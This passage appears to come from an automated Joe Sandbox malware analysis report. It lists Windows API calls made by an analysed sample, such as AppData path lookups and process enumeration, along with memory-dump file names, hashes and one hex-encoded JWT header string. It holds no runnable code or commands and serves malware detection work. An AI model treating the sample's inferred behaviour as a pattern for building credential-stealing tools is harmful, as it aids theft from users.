                                • Instruction Fuzzy Hash: AD018471845B089AE720AF7AD84575EBBE0AF50358F20890FE2D5576E1CBB8A544CB18
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004EE544
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE573
                                • lstrcat.KERNEL32(?,00000000), ref: 004EE581
                                • lstrcat.KERNEL32(?,00CFE600), ref: 004EE59C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 9ee765dff7e6d2a27acac432a9c68f76ec99ad8fb692469962293b9774b66b78
                                • Instruction ID: 4cbbdb39b519324373a1c0d89f3ed87044fb190e49e2889bcf56f16b507468ca
                                • Opcode Fuzzy Hash: 9ee765dff7e6d2a27acac432a9c68f76ec99ad8fb692469962293b9774b66b78
                                • Instruction Fuzzy Hash: D251C3B1A1010CEBCB54EB55EC52EEA337CEB48304F4045AEFA0587351DE78AE408BA9
                                APIs
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 004F1FDF, 004F1FF5, 004F20B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: strlen
                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 39653677-4138519520
                                • Opcode ID: f6db99e1a4dbfc777d4bfdf26963293eba586daf4d0f854cd308693aa26c5e8e
                                • Instruction ID: 054943c348f5827bc7ab1b03c51dc37680ad48238b6fce0ac9bd037025c4fad6
                                • Opcode Fuzzy Hash: f6db99e1a4dbfc777d4bfdf26963293eba586daf4d0f854cd308693aa26c5e8e
                                • Instruction Fuzzy Hash: B8214B3651018E8EC720EA35C5456FEF7A6EF80351F844057CB180B381EBB9190ADB9F
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004EEBB4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EEBE3
                                • lstrcat.KERNEL32(?,00000000), ref: 004EEBF1
                                • lstrcat.KERNEL32(?,00CFF708), ref: 004EEC0C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: e28659ea437915b750409e9a617a26c903897a16546c3ab769f0c3ac74423d82
                                • Instruction ID: 840419c9da4d43bcf31636826f569857e29f52b5b95915902ddf8814836b8508
                                • Opcode Fuzzy Hash: e28659ea437915b750409e9a617a26c903897a16546c3ab769f0c3ac74423d82
                                • Instruction Fuzzy Hash: 0331F571A1001CEBCB21EF65DD51BEE73B4EF58300F0045AAFA0697351CE78AE448B98
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000), ref: 004F4492
                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 004F44AD
                                • CloseHandle.KERNEL32(00000000), ref: 004F44B4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F44E7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                • String ID:
                                • API String ID: 4028989146-0
                                • Opcode ID: 5abe4812c739e189f9b569cd320a2a419d2f6e86c823b18ef5435f3598e28fc6
                                • Instruction ID: c900a2ca4e4ec57ec07443ffbe850c19d237ec2ba9c615527026e6db5a8214a0
                                • Opcode Fuzzy Hash: 5abe4812c739e189f9b569cd320a2a419d2f6e86c823b18ef5435f3598e28fc6
                                • Instruction Fuzzy Hash: 85F0FCF09016196BE7209B749D49BF776A8AF54304F048692FB85E7290DFF89D808798
                                APIs
                                • __getptd.LIBCMT ref: 004F8FDD
                                  • Part of subcall function 004F87FF: __amsg_exit.LIBCMT ref: 004F880F
                                • __getptd.LIBCMT ref: 004F8FF4
                                • __amsg_exit.LIBCMT ref: 004F9002
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 004F9026
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 34302941c5ff0eddb4a3ad8935a6fa08757ddf7211907dcc3f767a96d3450f8c
                                • Instruction ID: 2ed415e87eb4f32d2434c02918553f57db1c8db37f92a9b0863a4e1bb2861b95
                                • Opcode Fuzzy Hash: 34302941c5ff0eddb4a3ad8935a6fa08757ddf7211907dcc3f767a96d3450f8c
                                • Instruction Fuzzy Hash: 6BF0963294861C9FD761BB7A9806B7E33A06F00768F24410FF6446A2D3DF6C5940DA6D
                                APIs
                                • lstrlen.KERNEL32(------,004D5BEB), ref: 004F731B
                                • lstrcpy.KERNEL32(00000000), ref: 004F733F
                                • lstrcat.KERNEL32(?,------), ref: 004F7349
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcatlstrcpylstrlen
                                • String ID: ------
                                • API String ID: 3050337572-882505780
                                • Opcode ID: 576ad124bea4e3d2ac677fcd73d9dae0cd18ec899fa63e765f03183cc21529f9
                                • Instruction ID: 4aee1451a28b90dd2bab73672b69205e972c514ea2fe9df7dd27840a06f03ee5
                                • Opcode Fuzzy Hash: 576ad124bea4e3d2ac677fcd73d9dae0cd18ec899fa63e765f03183cc21529f9
                                • Instruction Fuzzy Hash: AAF015B46003029FDB249F75D848927BAF8AF84700318892EACDAC7324EA38E840CB14
                                APIs
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1557
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1579
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D159B
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E3422
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E344B
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E3471
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E3497
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: f6c475306017ea26e8ca33e6ede58dd1d953c8ef450366ee6a598b14df79cd48
                                • Instruction ID: 7bf664ae55ac136bb37b99ce7fa276e6cac3e059100338a1803b864eefdf191a
                                • Opcode Fuzzy Hash: f6c475306017ea26e8ca33e6ede58dd1d953c8ef450366ee6a598b14df79cd48
                                • Instruction Fuzzy Hash: 29120F70A012419FDB29CF2AC558726B7E4BF4471AB19C1AED409CB3A2D77ADD42CF48
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 004E7C94
                                • std::_Xinvalid_argument.LIBCPMT ref: 004E7CAF
                                  • Part of subcall function 004E7D40: std::_Xinvalid_argument.LIBCPMT ref: 004E7D58
                                  • Part of subcall function 004E7D40: std::_Xinvalid_argument.LIBCPMT ref: 004E7D76
                                  • Part of subcall function 004E7D40: std::_Xinvalid_argument.LIBCPMT ref: 004E7D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: string too long
                                • API String ID: 909987262-2556327735
                                • Opcode ID: 81a95c1d90cdf48b3b42a07f3b013d6c181a4cf6d0e88c456bab86da89714d96
                                • Instruction ID: 9047d57111b66ea2c9bb367307b3d035aa269140c1c2493aef281f71837685cb
                                • Opcode Fuzzy Hash: 81a95c1d90cdf48b3b42a07f3b013d6c181a4cf6d0e88c456bab86da89714d96
                                • Instruction Fuzzy Hash: 053127723082844BE724DE6EE88092AF3EDEF91731B30452BF1418B740D7659C41839D
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 004D6F74
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004D6F7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID: @
                                • API String ID: 1357844191-2766056989
                                • Opcode ID: 1f81dbdcfc458d5b1fcfb828f4decb010cf4aa6a77bcdc08890fa4bb0a8724a0
                                • Instruction ID: d72caad221646112707e90fcc2c86db3a329eba1113202e9c39ed79ec58e7f33
                                • Opcode Fuzzy Hash: 1f81dbdcfc458d5b1fcfb828f4decb010cf4aa6a77bcdc08890fa4bb0a8724a0
                                • Instruction Fuzzy Hash: B4219D70600A019BEB208F20D890BBB73B8EB45704F45886EE986CBB81FB78E945C754
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F244C
                                • lstrlen.KERNEL32(00000000), ref: 004F24E9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F2570
                                • lstrlen.KERNEL32(00000000), ref: 004F2577
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: ed2a2b8b39cbf753e6a4c3a0ad89c59955ab6443765c2745c0404eb84d638dcd
                                • Instruction ID: 4690f2a0cbf5d3c4cd5beb3f72babce8800830bbce40eff35bb972bbf1bf3dd8
                                • Opcode Fuzzy Hash: ed2a2b8b39cbf753e6a4c3a0ad89c59955ab6443765c2745c0404eb84d638dcd
                                • Instruction Fuzzy Hash: AC81F4B0E0020E9BDB10CB95CD54BBEB7B5EF84304F14816EE604A7381EBB99D45CB98
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 004F15A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F15D9
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F1611
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F1649
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
